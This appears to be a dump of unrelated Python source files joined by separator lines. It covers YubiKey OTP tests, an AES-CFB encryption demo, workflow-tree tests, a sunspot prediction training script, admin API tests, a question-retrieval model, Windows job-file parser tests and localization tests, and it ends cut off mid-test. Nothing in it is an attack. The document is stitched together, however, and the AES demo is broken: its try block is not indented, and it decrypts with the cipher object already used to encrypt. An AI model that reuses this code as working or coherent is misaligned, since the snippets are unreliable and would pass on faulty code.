    assert frame.payload == '\x00' * (bc.block_size - 4)
    frame.set_payload(test_payload)
    frame.set_mode(0)
    # Round-trip: encipher, then recover the same frame from the ciphertext.
    assert frame.get_enciphered(bc, h, test_tweak) == test_enciphered_frame
    frame = otp.Frame2.from_enciphered(bc, h, test_enciphered_frame, test_tweak)
    assert frame.mode == 0
    assert frame.ct == 0
    assert frame.payload == test_payload
    # Test SoftKey2.next()
    soft_key = otp.SoftKey2(test_key, test_id, 0, disable_engage=True)
    for i in range(1000):
        enciphered_frame = soft_key.next(otp.MODE_OTP, test_payload, test_tweak)
        frame = otp.Frame2.from_enciphered(bc, h, enciphered_frame, test_tweak)
        assert frame.mode == 1
        assert frame.ct == i
        assert frame.payload == test_payload
    # Test SoftKey2.opt0()
    p = soft_key.otp0()
    (id, enciphered_frame) = otp.decode(p)
    assert id == test_id
    frame = otp.Frame2.from_enciphered(bc, h, enciphered_frame, None)
    assert frame.payload == '\x00' * (bc.block_size - 4)
    assert frame.mode == 0
    # Counter continues from the 1000 next() calls above.
    assert frame.ct == 1000
    # Test SoftKey2.dispatch()
    (enciphered_frame, err) = soft_key.dispatch('otp', (otp.MODE_OTP, None, None))
    assert err == None
    frame = otp.Frame2.from_enciphered(bc, h, enciphered_frame, None)
    assert frame.payload == '\x00' * (bc.block_size - 4)
def test3():
    '''Tests the HMAC-SHA1.
    Requires a YubiKey with OTP challenge-response configured in slot 2.
    '''
    try:
        key = yubico.find_yubikey(debug=False)
        # Probe the device with challenges of several lengths and paddings;
        # results are printed for manual inspection rather than asserted.
        print key.challenge_response(('\x00' * 63) + '\x01',
            mode='HMAC', slot=2, may_block=True).encode('hex')
        print key.challenge_response(('\x00' * 62) + '\x01',
            mode='HMAC', slot=2, may_block=True).encode('hex')
        print key.challenge_response(('\x00' * 62) + '\x01\x00',
            mode='HMAC', slot=2, may_block=True).encode('hex')
        print key.challenge_response('',
            mode='HMAC', slot=2, may_block=True).encode('hex')
        print key.challenge_response('\x00',
            mode='HMAC', slot=2, may_block=True).encode('hex')
        print key.challenge_response('\x00'*64,
            mode='HMAC', slot=2, may_block=True).encode('hex')
    except yubico.yubico_exception.YubicoError as e:
        print e.reason
        sys.exit(1)
if __name__ == '__main__':
    # test1() and test2() need a physical YubiKey / SoftKey2 setup, so only
    # the HMAC probe runs by default.
    #test1()
    #test2()
    test3()
    print "pass"
|
from Crypto import Random
from Crypto.Cipher import AES
from sys import argv
def abre(i):
    """Return the full contents of the file named by command-line argument *i*.

    Uses a context manager so the handle is closed even if read() raises;
    the original leaked the handle on error.
    """
    with open(argv[i]) as handle:
        return handle.read()
chave = abre(1)
texto = abre(2)
IV = Random.new().read(AES.block_size)
try:
cipher = AES.new(chave, mode=AES.MODE_CFB, IV=IV)
except ValueError as error:
print error
exit(0)
criptografado = IV + cipher.encrypt(texto)
decriptografado = cipher.decrypt(criptografado)[AES.block_size:]
print "\nTexto criptografado:\n", criptografado
print "\nTexto decriptografado:\n", decriptografado
|
import pytest
from takler.core import Flow
from takler.core.node import Node
from .util import get_node_tree_print_string
class ObjectContainer:
    """Plain attribute bag used by fixtures to hand several nodes to tests."""
    pass
@pytest.fixture
def child_case():
    """Build and requeue a small flow tree, returning its nodes in a container.

    |- flow1
       |- container1
          |- task1
          |- task2
    """
    result = ObjectContainer()
    flow1 = Flow("flow1")
    result.flow1 = flow1
    with flow1.add_container("container1") as container1:
        result.container1 = container1
        with container1.add_task("task1") as task1:
            result.task1 = task1
        with container1.add_task("task2") as task2:
            result.task2 = task2
    # Requeue so every node starts from a known (queued) state.
    flow1.requeue()
    return result
def test_container_node(child_case):
    """The container serializes itself and both child tasks to a plain dict."""
    container1 = child_case.container1
    # status=3 here corresponds to the requeued state set by the fixture.
    assert container1.to_dict() == dict(
        name="container1",
        class_type=dict(
            module="takler.core.node_container",
            name="NodeContainer"
        ),
        state=dict(status=3, suspended=False),
        children=[
            dict(
                name="task1",
                class_type=dict(
                    module="takler.core.task_node",
                    name="Task"
                ),
                state=dict(status=3, suspended=False),
                task_id=None,
                aborted_reason=None,
                try_no=0,
            ),
            dict(
                name="task2",
                class_type=dict(
                    module="takler.core.task_node",
                    name="Task"
                ),
                state=dict(status=3, suspended=False),
                task_id=None,
                aborted_reason=None,
                try_no=0,
            )
        ]
    )
def test_from_dict(child_case):
    """Node.from_dict rebuilds a tree whose printout matches the fixture's.

    Fix: removed the dead trailing ``return`` statement (it had no effect in
    a test function).
    """
    container1 = child_case.container1
    d = dict(
        name="container1",
        class_type=dict(
            module="takler.core.node_container",
            name="NodeContainer"
        ),
        state=dict(status=3, suspended=False),
        children=[
            dict(
                name="task1",
                class_type=dict(
                    module="takler.core.task_node",
                    name="Task"
                ),
                state=dict(status=3, suspended=False),
                task_id=None,
                aborted_reason=None,
                try_no=0,
            ),
            dict(
                name="task2",
                class_type=dict(
                    module="takler.core.task_node",
                    name="Task"
                ),
                state=dict(status=3, suspended=False),
                task_id=None,
                aborted_reason=None,
                try_no=0,
            )
        ]
    )
    node = Node.from_dict(d)
    # Compare via the rendered tree text rather than object identity.
    node_text = get_node_tree_print_string(node)
    expected_node_text = get_node_tree_print_string(container1)
    assert node_text == expected_node_text
|
import argparse
import os
import datetime
import numpy as np
from torch.utils.data import DataLoader
import model.trainer as trainer
from model.sunspots import SunspotData
from model.model_factory import Model
import torch
from utils.utils import SummaryHelper
# -----------------------------------------------------------------------------
# Command-line configuration for training / evaluating the prediction model.
parser = argparse.ArgumentParser(description='PyTorch Magnetic field Prediction Model')
# training/test
parser.add_argument('--is_training', type=bool, default=True)
parser.add_argument('--device', type=str, default='cuda:0', help='cuda or cpu')
parser.add_argument('--resume', default=False, help='continue training: True or False')
parser.add_argument('--resume_count', type=int, default=1, help='when resume,from which count to epoch')
parser.add_argument('--is_sunspots', type=bool, default=False, help='Whether it is a sunspot dataset?')
parser.add_argument('--mix', default=False, help='whether use mixed precision')
parser.add_argument('--uniform_size', type=bool, default=False, help='Whether the size of the dataset is uniform?')
# data
parser.add_argument('--dataset_name', type=str, default='sunspots')
parser.add_argument('--train_data_paths', type=str, default='../datasets/MF_datasets/train')
parser.add_argument('--valid_data_paths', type=str, default='../datasets/MF_datasets/valid')
parser.add_argument('--test_data_paths', type=str, default='../datasets/MF_datasets/test')
parser.add_argument('--save_dir', type=str, default='../outputs/MF_results/checkpoints/')
parser.add_argument('--logs_dir', type=str, default='../outputs/MF_results/logs')
parser.add_argument('--gen_frm_dir', type=str, default='../outputs/MF_results/sample')
parser.add_argument('--test_dir', type=str, default='../outputs/MF_results/test')
parser.add_argument('--input_length', type=int, default=12)  # Input sequence length
parser.add_argument('--predict_length', type=int, default=6)  # Prediction sequence length
parser.add_argument('--total_length', type=int, default=24)  # Total length of magnetic field sequence
parser.add_argument('--img_height', type=int, default=60)
parser.add_argument('--img_width', type=int, default=100)
parser.add_argument('--img_channel', type=int, default=1)
# model
parser.add_argument('--model_name', type=str, default='custom')
parser.add_argument('--pretrained_model', type=str, default='../outputs/MF_results/checkpoints/model.ckpt')
parser.add_argument('--num_hidden', type=str, default='48,48,48')
parser.add_argument('--filter_size', type=int, default=5)
parser.add_argument('--stride', type=int, default=1)
# scheduled sampling (see schedule_sampling below for how these interact)
parser.add_argument('--scheduled_sampling', type=bool, default=True)
parser.add_argument('--sampling_stop_iter', type=int, default=80)
parser.add_argument('--sampling_start_value', type=float, default=1.0)
parser.add_argument('--sampling_changing_rate', type=float, default=0.0125)
# optimization
parser.add_argument('--num_work', default=5, type=int, help='threads for loading data')
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--reverse_input', type=bool, default=False)
parser.add_argument('--batch_size', type=int, default=1)
parser.add_argument('--max_epoch', type=int, default=120)
parser.add_argument('--display_interval', type=int, default=100)
parser.add_argument('--test_interval', type=int, default=1)
parser.add_argument('--snapshot_interval', type=int, default=1)
parser.add_argument('--num_save_samples', type=int, default=20)
args = parser.parse_args()
def schedule_sampling(eta, epoch):
    """Compute the scheduled-sampling mask for one epoch.

    Returns the decayed sampling probability ``eta`` and a float32 mask of
    shape (batch_size, predict_length - 1): 1.0 where the ground-truth frame
    is fed to the model, 0.0 where the model's own prediction is used.
    When scheduled sampling is disabled, eta is forced to 0 and the mask is
    all zeros.
    """
    if not args.scheduled_sampling:
        zeros = np.zeros((args.batch_size, args.predict_length - 1), dtype=np.float32)
        return 0.0, zeros
    # Linearly decay eta until sampling_stop_iter, then pin it at zero.
    if epoch < args.sampling_stop_iter:
        eta -= args.sampling_changing_rate
    else:
        eta = 0.0
    random_flip = np.random.random_sample(
        (args.batch_size, args.predict_length - 1))
    # Vectorized replacement for the original element-wise double loop:
    # a cell is 1.0 exactly when its random draw falls below eta.
    real_input_flag = (random_flip < eta).astype(np.float32)
    return eta, real_input_flag
def train_wrapper(model):
    """Train the model, checkpointing and validating at configured intervals."""
    # resume train
    resume_count = 1
    if args.resume:
        model.load(args.pretrained_model)
        resume_count = args.resume_count
    # load data
    train_loader = DataLoader(dataset=SunspotData(args.train_data_paths, args), num_workers=args.num_work,
                              batch_size=args.batch_size, shuffle=True, pin_memory=True, drop_last=True)
    valid_loader = DataLoader(dataset=SunspotData(args.valid_data_paths, args), num_workers=0,
                              batch_size=args.batch_size, shuffle=True, pin_memory=False, drop_last=True)
    # Separate TensorBoard-style writers for train and validation curves.
    train_summary = SummaryHelper(save_path=os.path.join(args.logs_dir, 'train'),
                                  comment='custom', flush_secs=20)
    test_summary = SummaryHelper(save_path=os.path.join(args.logs_dir, 'test'),
                                 comment='custom', flush_secs=20)
    eta = args.sampling_start_value
    for epoch in range(resume_count, args.max_epoch + 1):
        loss = []
        model.train_mode()
        for itr, (imgs, names) in enumerate(train_loader):
            # eta carries over between batches so the sampling schedule decays.
            eta, real_input_flag = schedule_sampling(eta, epoch)
            real_input_flag = torch.from_numpy(real_input_flag)
            itr_loss = trainer.train(model, imgs, real_input_flag, args, epoch, itr)
            loss.append(itr_loss)
        train_loss_avg = np.mean(loss)
        train_summary.add_scalar('train/loss', train_loss_avg, global_step=epoch)
        if epoch % args.snapshot_interval == 0:
            model.save(epoch)
        if epoch % args.test_interval == 0:
            model.eval_mode()
            metrics = trainer.test(model, valid_loader, args, epoch, args.gen_frm_dir, args.is_sunspots)
            test_summary.add_scalars('test', metrics, global_step=epoch)
def test_wrapper(model):
    """Restore the pretrained checkpoint and run one pass over the test split."""
    model.load(args.pretrained_model)
    model.eval_mode()
    dataset = SunspotData(args.test_data_paths, args)
    test_loader = DataLoader(dataset=dataset, num_workers=0,
                             batch_size=args.batch_size, shuffle=False, pin_memory=False)
    # Timestamp tag identifying this evaluation run's output.
    flag = str(datetime.datetime.now().strftime('%Y_%m_%d___%H_%M_%S'))
    trainer.test(model, test_loader, args, flag, args.test_dir, args.is_sunspots)
if __name__ == '__main__':
    print(args)
    # Fixed seed and cuDNN autotuning for reproducible-ish, fast training.
    torch.manual_seed(2020)
    torch.backends.cudnn.benchmark = True
    torch.backends.cudnn.enabled = True
    # Make sure every output directory exists before training starts.
    if not os.path.exists(args.save_dir):
        os.makedirs(args.save_dir)
    if not os.path.exists(args.gen_frm_dir):
        os.makedirs(args.gen_frm_dir)
    if not os.path.exists(args.logs_dir):
        os.makedirs(args.logs_dir)
    if not os.path.exists(args.test_dir):
        os.makedirs(args.test_dir)
    model = Model(args)
    print('====> Model initialization completed')
    if args.is_training:
        train_wrapper(model)
    else:
        test_wrapper(model)
|
import unittest
import ddt
import requests
from common.readCookie import get_cookie
# Query permutations for the page-query endpoint; each case carries the
# expected response message under the 'assert' key.
testData1 = [{'assert':'SUCCESS'},
    {'account':'2585683','assert':'SUCCESS'},
    {'account': 'tester', 'assert': 'SUCCESS'},
    {'account': '测试徐群节', 'assert': 'SUCCESS'},
    {'account': '55555555', 'assert': 'SUCCESS'},
    {'account': '13026005868a', 'assert': 'SUCCESS'},
    {'auditStatus':0,'assert':'SUCCESS'},
    {'auditStatus': 1, 'assert': 'SUCCESS'},
    {'auditStatus': 2, 'assert': 'SUCCESS'},
    {'cardNo':'55555555','assert':'SUCCESS'},
    {'validationType':1,'assert':'SUCCESS'},
    {'validationType': 2, 'assert': 'SUCCESS'},
    {'registryStartDate':'2019-07-19', 'assert': 'SUCCESS'},
    {'registryEndDate':'2019-08-19', 'assert': 'SUCCESS'}]
@ddt.ddt
class PagesQuerys(unittest.TestCase):
    """Real-name verification management (实名管理) page-query endpoint tests."""
    def setUp(self):
        # A fresh session cookie is fetched before every test case.
        self.headers = {'Cookie':get_cookie()}
        self.url = "https://api.admin.ezbtest.top/admin/member/member-application/page-query"
    def tearDown(self):
        print('test over')
    @ddt.data(*testData1)
    def test_chart(self, value):
        # The expected message travels inside the test data under 'assert'.
        rs = requests.post(url=self.url, headers=self.headers,data=value).json()
        print(rs)
        self.assertEqual(value['assert'], rs['message'])
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
import numpy as np
from sklearn import metrics
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
import gzip
import inout as utils
from meter import AUCMeter
from sklearn.feature_extraction.text import TfidfVectorizer
from evaluation import Evaluation
from tqdm import tqdm
import meter
# AskUbuntu question-retrieval corpus paths.
train_file = "../data/askubuntu-master/train_random.txt"
dev_file = "../data/askubuntu-master/dev.txt"
test_file = "../data/askubuntu-master/test.txt"
word_embs_file = "../data/askubuntu-master/vector/vectors_pruned.200.txt"
query_corpus_file = "../data/askubuntu-master/text_tokenized.txt.gz"
torch.manual_seed(1)
batch_size = 20
# hidden_dim = 300
hidden_dim = 200
# Preprocess the full corpus into batches and eval splits (Python 2 script).
train_batches, dev_data, dev_labels, test_data, test_labels = utils.build_batches(train_file, dev_file, test_file, word_embs_file, query_corpus_file, 20)
print "Data preprocessed"
# train_dataset = torch.utils.data.TensorDataset(torch.FloatTensor(train_x), torch.LongTensor(train_y))
# dev_dataset = torch.utils.data.TensorDataset(torch.FloatTensor(dev_x), torch.LongTensor(dev_y))
# test_dataset = torch.utils.data.TensorDataset(torch.FloatTensor(test_x), torch.LongTensor(test_y))
# train_loader = torch.utils.data.DataLoader(train_dataset)
# dev_loader = torch.utils.data.DataLoader(dev_dataset)
# test_loader = torch.utils.data.DataLoader(test_dataset)
class DAN(nn.Module):
    """Deep-averaging-network encoder: input_dim -> 150 -> 100.

    ``args`` is (input_dim, hidden_dim, dropout).  NOTE(review): hidden_dim
    is unpacked but never used -- the layer widths are hard-coded at 150 and
    100 -- and ``embeddings`` is likewise accepted but unused; confirm the
    hyper-parameter sweep over hidden_dims is intentional.
    """
    def __init__(self, embeddings, args):
        super(DAN, self).__init__()
        input_dim, hidden_dim, dropout = args
        self.input_dim = input_dim
        stack = [
            nn.Linear(self.input_dim, 150),
            nn.ReLU(),
            nn.Dropout(p=dropout),
            nn.Linear(150, 100),
            nn.Tanh(),
        ]
        self.seq = nn.Sequential(*stack)

    def forward(self, x):
        """Encode a batch of averaged word embeddings into 100-dim vectors."""
        return self.seq(x)
class LSTM(nn.Module):
    """Single-layer LSTM encoder over a (seq_len, 200) embedding matrix."""
    def __init__(self, embeddings, args):
        super(LSTM, self).__init__()
        self.args = args
        self.lstm = nn.LSTM(input_size=200, hidden_size=200,
                            num_layers=1, batch_first=True)

    def init_hidden(self, batch_size):
        """Return zeroed (h0, c0) states for ``batch_size`` sequences."""
        h0 = torch.autograd.Variable(torch.zeros(1, batch_size, 200))
        c0 = torch.autograd.Variable(torch.zeros(1, batch_size, 200))
        return (h0, c0)

    def forward(self, x):
        # (seq_len, 200) -> (1, seq_len, 200): a single batch-first sequence.
        x = x.unsqueeze(1)
        x = x.permute(1, 0, 2)
        # Bug fix: the original sized the hidden state with len(x) (the
        # sequence length), but after the reshape the batch dimension is 1,
        # so nn.LSTM rejected any input with more than one row.
        h0, c0 = self.init_hidden(1)
        output, (h_n, c_n) = self.lstm(x, (h0, c0))
        return output
class CNN(nn.Module):
    """Convolutional encoder (unused by the sweep at the bottom of the file).

    NOTE(review): forward() unsqueezes to (N, 200, 1), giving length-1
    sequences that are shorter than kernel_size=3 -- Conv1d would reject
    that input.  Confirm the intended input shape before reviving this class.
    """
    def __init__(self, embeddings, args):
        super(CNN, self).__init__()
        self.args = args
        self.conv1 = nn.Conv1d(200, 200, kernel_size=3)
    def forward(self, x):
        # x = x.permute(0,2,1)
        print x.size()
        x = x.unsqueeze(2)
        out = self.conv1(x)
        # Average over the sequence dimension.
        out = torch.mean(out, 2)
        # print("size of out", out.size())
        return out
def train(model, train_data, max_epoches, dev_data, dev_labels, lr, weight_decay, verbose=False):
    """Train the encoder with multi-margin ranking loss over cosine scores.

    Each training batch holds 20 query groups of 22 questions (1 query,
    1 positive, 20 negatives).  Early-stops after 5 epochs without dev-MRR
    improvement.
    """
    model.train()
    weight_decay = weight_decay
    lr = lr
    # weight_decay = 1e-5 # 1e-5
    # lr = 1e-3 # 1e-3
    dc_lr = 1e-3
    l = 1e-5 #lambda
    margin = 0.2 #0.1 before
    optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)
    criterion = torch.nn.MultiMarginLoss(margin=margin)
    best_dev = -1
    corresponding_test = 0.0
    unchanged = 0
    # dev_titles, dev_bodies = dev_data
    # dev_title_embs = Variable(torch.utils.data.TensorDataset(torch.FloatTensor(dev_titles)))
    # dev_body_embs = Variable(torch.utils.data.TensorDataset(torch.FloatTensor(dev_bodies)))
    # dev_title_embs = Variable(dev_titles)
    # dev_body_embs = Variable(dev_bodies)
    for epoch in range(max_epoches):
        unchanged += 1
        if unchanged > 5: break
        print "==============="
        print "EPOCH ", epoch
        batch_num = 0
        for batch in train_data:
            # print batch_num
            batch_num+=1
            titles, bodies = batch
            title_embeddings = Variable(torch.FloatTensor(titles))
            # title_embeddings = Variable(titles)
            body_embeddings = Variable(torch.FloatTensor(bodies))
            # body_embeddings = Variable(bodies)
            title_output = model(title_embeddings)
            body_output = model(body_embeddings)
            # print "title input", np.array(titles).shape
            # print "title embeddings", title_embeddings.data.shape
            # print "title output shape", title_output.data.shape
            # question_embeddings = np.mean([title_output, body_output], axis=0)
            # A question is represented by the mean of its title and body encodings.
            question_embeddings = (title_output + body_output)/2.
            # len(question_embeddings) = 440 = 22 * 20
            '''
            create matrix by iterating from 0 to 20, 0 to 21:
            x = 20x21 matrix, mapping q to cosine similarity of each of 21 questions for each set of 22 questions
            y = list of positive question indices, which is always 0 in that row
            '''
            X = []
            for i in range(20):
                query_emb = question_embeddings[i * 20]
                for j in range(22):
                    # print i, j, i*20, i*20+j
                    # print type(question_embeddings[i*20])
                    if j != 0:
                        index = i * 20 + j
                        # print query_emb.size()
                        # print question_embeddings[index].size()
                        if query_emb.size()!=(100L,1L):
                            query_emb=torch.unsqueeze(query_emb, 1)
                        # print query_emb.size()
                        question_embeddings_index = torch.unsqueeze(question_embeddings[index], 1)
                        # print question_embeddings_index.size()
                        # X[i, j-1] = F.cosine_similarity(query_emb, question_embeddings[index], dim=1)
                        X.append(F.cosine_similarity(torch.t(query_emb), torch.t(question_embeddings_index), dim=1))
            # for i in range(20): # b rows, b = number of instances in a batch
            #     for j in range(21):
            #         X[i,j] = F.cosine_similarity(torch.FloatTensor(question_embeddings[i][0]), torch.FloatTensor(question_embeddings[i][j]))
            # The positive candidate is always at index 0 within each group.
            Y = np.array([0 for i in range(20)])
            optimizer.zero_grad()
            loss = criterion(torch.cat(X), Variable(torch.LongTensor(Y)))
            # print "loss", loss
            loss.backward()
            optimizer.step()
        # Validate once per epoch; reset the early-stop counter on improvement.
        map_score, dev_MRR, p1, p5 = evaluate(dev_data, dev_labels, model)
        if dev_MRR > best_dev:
            unchanged = 0
            best_dev = dev_MRR
        print "Loss", loss
        print "=============="
def evaluate(data, labels, model):
    """Score the model on an eval split and print/return MAP, MRR, P@1, P@5."""
    print "Evaluating Data"
    res = [ ]
    # Switch off dropout etc. for scoring; caller re-enables train mode.
    model.eval()
    res = compute_scores(data, labels, model)
    evaluation = Evaluation(res)
    MAP = evaluation.MAP()*100
    MRR = evaluation.MRR()*100
    P1 = evaluation.Precision(1)*100
    P5 = evaluation.Precision(5)*100
    print "Evaluation:", MAP, MRR, P1, P5
    return MAP, MRR, P1, P5
def compute_scores(data, labels, model):
    """Rank candidate labels per query group by cosine similarity.

    Processes labels in groups of 21 candidates; each group is flushed to
    ``res`` as its labels ordered by model score.

    NOTE(review): indexing with ``[-ranks]`` looks suspicious -- negating
    argsort indices leaves index 0 in place instead of reversing the order
    (``ranks[::-1]`` is the usual descending form); confirm intended ranking.
    NOTE(review): the final group is never flushed after the loop ends --
    confirm whether the trailing candidates are deliberately dropped.
    """
    res = []
    scores = []
    curr_labels = []
    titles = data[0]
    bodies = data[1]
    # print len(titles), len(bodies), len(labels)
    # print titles[0], titles[1], " space", bodies[0], bodies[1], 'space', labels[0], labels[1]
    for i in range(len(labels)):
        curr_labels.append(labels[i])
        if i%21==0 and i != 0:
            # print "len curr", len(curr_labels)
            ranks=np.asarray(scores)
            ranks=ranks.argsort()
            # print ranks
            # print np.asarray(curr_labels)
            ranked_labels = np.asarray(curr_labels)[-ranks]
            # print ranked_labels
            res.append(ranked_labels)
            scores = []
            curr_labels = []
        titles_i = titles[i]
        bodies_i = bodies[i]
        labels_i = labels[i]
        # print (titles_i), (bodies_i), (labels_i), 'titles bodies labels'
        title_embeddings = Variable(torch.FloatTensor(titles_i))
        body_embeddings = Variable(torch.FloatTensor(bodies_i))
        title_output = model(title_embeddings)
        body_output = model(body_embeddings)
        # Question embedding = mean of title and body encodings.
        question_embeddings = (title_output + body_output)/2.
        question_embeddings_query = torch.unsqueeze(question_embeddings[0], 1)
        question_embeddings_candidates = torch.unsqueeze(question_embeddings[1:], 1)
        # print question_embeddings_query.size(), question_embeddings_candidates.size()
        scores.append(F.cosine_similarity(torch.t(question_embeddings_query), torch.t(question_embeddings_candidates)).data.cpu().numpy()[0])
    return res
# model = DAN(train_batches, [200])
# model = LSTM(train_batches, [])
# train(model, train_batches, 50, dev_data, dev_labels)
# Hyper-parameter sweep.  NOTE(review): DAN ignores its hidden_dim argument
# (layer widths are hard-coded), so varying hidden_dims has no effect.
lrs = [5e-4]
# weight_decays = [1]
weight_decays = [0.9]
# dropouts = [0, 0.1, 0.2, 0.3]
dropouts = [0.3]
hidden_dims = [300]
# hidden_dims = [250, 300]
# hidden_dims = [500, 600]
for dr in dropouts:
    for hidden_dim in hidden_dims:
        for lr in lrs:
            for wd in weight_decays:
                print "*************************************************************************"
                print "LR: ", lr, "\tWD: ", wd, "\tHiddenDim: ", hidden_dim, "\tDR: ", dr
                model = DAN(train_batches, [200, hidden_dim, dr])
                print "model created"
                train(model, train_batches, 50, dev_data, dev_labels, lr, wd)
                print "model trained, now testing"
                evaluate(test_data, test_labels, model)
                print "*************************************************************************"
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Windows Scheduled Task job file parser."""
import unittest
from plaso.lib import definitions
from plaso.parsers import winjob
from tests.parsers import test_lib
class WinJobTest(test_lib.ParserTestCase):
  """Tests for the Windows Scheduled Task job file parser."""

  def testParse(self):
    """Tests the Parse function."""
    parser = winjob.WinJobParser()
    storage_writer = self._ParseFile(['wintask.job'], parser)
    self.assertEqual(storage_writer.number_of_warnings, 0)
    self.assertEqual(storage_writer.number_of_events, 2)
    events = list(storage_writer.GetEvents())
    expected_comment = (
        'Keeps your Google software up to date. If this task is disabled or '
        'stopped, your Google software will not be kept up to date, meaning '
        'security vulnerabilities that may arise cannot be fixed and features '
        'may not work. This task uninstalls itself when there is no Google '
        'software using it.')
    # First event: last-run timestamp with full task metadata.
    expected_event_values = {
        'application': (
            'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'),
        'data_type': 'windows:tasks:job',
        'comment': expected_comment,
        'parameters': '/ua /installsource scheduler',
        'timestamp': '2013-08-24 12:42:00.112000',
        'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_RUN,
        'username': 'Brian'}
    self.CheckEventValues(storage_writer, events[0], expected_event_values)
    # Parse second event. Same metadata; different timestamp event.
    expected_event_values = {
        'application': (
            'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'),
        'data_type': 'windows:tasks:job',
        'parameters': '/ua /installsource scheduler',
        'timestamp': '2013-07-12 15:42:00.000000',
        'timestamp_desc': 'Scheduled to start',
        'trigger_type': 1,
        'username': 'Brian'}
    self.CheckEventValues(storage_writer, events[1], expected_event_values)

  def testParseWithTimeZone(self):
    """Tests the Parse function with a time zone."""
    parser = winjob.WinJobParser()
    storage_writer = self._ParseFile(['wintask.job'], parser, timezone='CET')
    self.assertEqual(storage_writer.number_of_warnings, 0)
    self.assertEqual(storage_writer.number_of_events, 2)
    events = list(storage_writer.GetEvents())
    # CET is UTC+2 in July, so the scheduled-start time shifts by two hours.
    expected_event_values = {
        'application': (
            'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'),
        'data_type': 'windows:tasks:job',
        'parameters': '/ua /installsource scheduler',
        'timestamp': '2013-07-12 13:42:00.000000',
        'timestamp_desc': 'Scheduled to start',
        'trigger_type': 1,
        'username': 'Brian'}
    self.CheckEventValues(storage_writer, events[1], expected_event_values)
# Allow running this test module directly.
if __name__ == '__main__':
  unittest.main()
|
from nose.tools import eq_
import os, sys
# Objective-C fixture using the default auto-localize prefix; the runtime
# strings below must stay byte-for-byte as the parser output depends on them.
mfile = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = __LOCALIZE@"Test String to Auto Localize";
self.label.text = __LOCALIZE@"Test String to Auto %20@ Localize with %02d = 2 formatting arguments";
}
@end
"""
# Fixture with a custom auto-localize prefix.
mfile_custom = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = __LOCALIZE_ME_PLEASE@"Test String to Auto Localize";
}
@end
"""
# Expected parser output for mfile (whitespace-insensitive comparison).
correct_output = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = NSLocalizedStringWithDefaultValue(@"test-string-to-auto-localize", kDefaultLocalizationsTable, kClassBundle,
@"Test String to Auto Localize",@"Test String to Auto Localize");
self.label.text = NSLocalizedStringWithDefaultValue(@"test-string-to-auto-[]-localize-with-[]-2-formatting-arguments", kDefaultLocalizationsTable, kClassBundle,
@"Test String to Auto %20@ Localize with %02d = 2 formatting arguments",@"Test String to Auto %20@ Localize with %02d = 2 formatting arguments");
}
@end
"""
# Expected parser output for mfile_custom.
correct_output_custom = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = NSLocalizedStringWithDefaultValue(@"test-string-to-auto-localize", mytable, mybundle,
@"Test String to Auto Localize",@"Test String to Auto Localize");
}
@end
"""
import re
from localize_m.main import parse
from io import StringIO
import codecs
# Used by prepare() to make comparisons whitespace-insensitive.
w_re = re.compile(r"\s+")
def prepare(text):
    """Strip every run of whitespace so outputs compare layout-insensitively."""
    return re.sub(r"\s+", "", text)
def test_file():
    """parse() auto-localizes __LOCALIZE-prefixed strings with the defaults."""
    source = StringIO(mfile)
    rendered = StringIO()
    parse("testfile", source, rendered, ask_all=False, comments=False)
    # Whitespace-insensitive comparison against the expected rendering.
    eq_(prepare(rendered.getvalue()), prepare(correct_output))
def test_custom():
    """A custom prefix, bundle, and table are honored by parse()."""
    source = StringIO(mfile_custom)
    rendered = StringIO()
    options = {
        "ask_all": False,
        "comments": False,
        "autoreplace_prefix": "__LOCALIZE_ME_PLEASE",
        "bundle": "mybundle",
        "table": "mytable",
    }
    parse("testfile", source, rendered, **options)
    eq_(prepare(rendered.getvalue()), prepare(correct_output_custom))
def test_cli():
    """Smoke-test the command-line entry point against the bundled fixture.

    Fixes: ``raise "Failed"`` raised a plain string, which is a TypeError in
    Python 3 -- an AssertionError now reports the real failure; the fixture
    handle is also closed instead of leaked.
    """
    # Open (and close) the fixture first for a clearer failure if it is missing.
    infile = codecs.open(os.path.join(os.path.dirname(__file__), "test.m"), "r")
    infile.close()
    from localize_m.main import main
    # NOTE(review): argv[0] is usually the program name -- confirm main()
    # parses this argv shape as intended.
    sys.argv = ["-i", "tests/test.m"]
    try:
        main()
    except SystemExit:
        raise AssertionError("Failed")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import os
import sys
import shutil
import tempfile
from crossprocess.process import run_script
from crossprocess.objects import SimpleObject
class TestCrossprocess(object):
    """Integration tests for run_script: fixture scripts run in a subprocess."""

    def get_script(self, name, extension='.py'):
        """
        helper method to get a fixture script
        :param name: script name without extension
        :param extension: script extension
        """
        return os.path.join(
            os.path.dirname(__file__),
            'fixtures',
            name + extension
        )

    def read_from_stdout(self, result):
        """
        helper method to extract the stdout string
        :param result: the result tuple returned from run_script
        """
        return result[0].decode().strip()

    def copy_script(self, script):
        """
        helper method to create a temporary copy of a given script
        :param script: script to copy
        """
        # NOTE(review): the temp file is closed before its name is reused,
        # which is racy (and fails on Windows delete-on-close) -- confirm
        # mkstemp would not be safer here.
        tmpfile = tempfile.NamedTemporaryFile()
        name = tmpfile.name
        tmpfile.close()
        shutil.copyfile(script, name)
        return name

    def test_run_script(self):
        """
        run a simple script
        """
        # The 'simple' fixture prints its own path.
        assert self.get_script('simple') == self.read_from_stdout(
            run_script(self.get_script('simple')))

    def test_run_script_handle_fails(self):
        """
        ensure failing script is handled
        """
        with pytest.raises(Exception):
            run_script(self.get_script('failing'))

    def test_run_script_keeps_sys_path(self):
        """
        cross process sys path
        """
        expected = os.path.join(
            os.path.dirname(__file__),
            'mydir'
        )
        # Entries added to sys.path here must be visible in the subprocess.
        sys.path.append(expected)
        script = self.get_script('syspath')
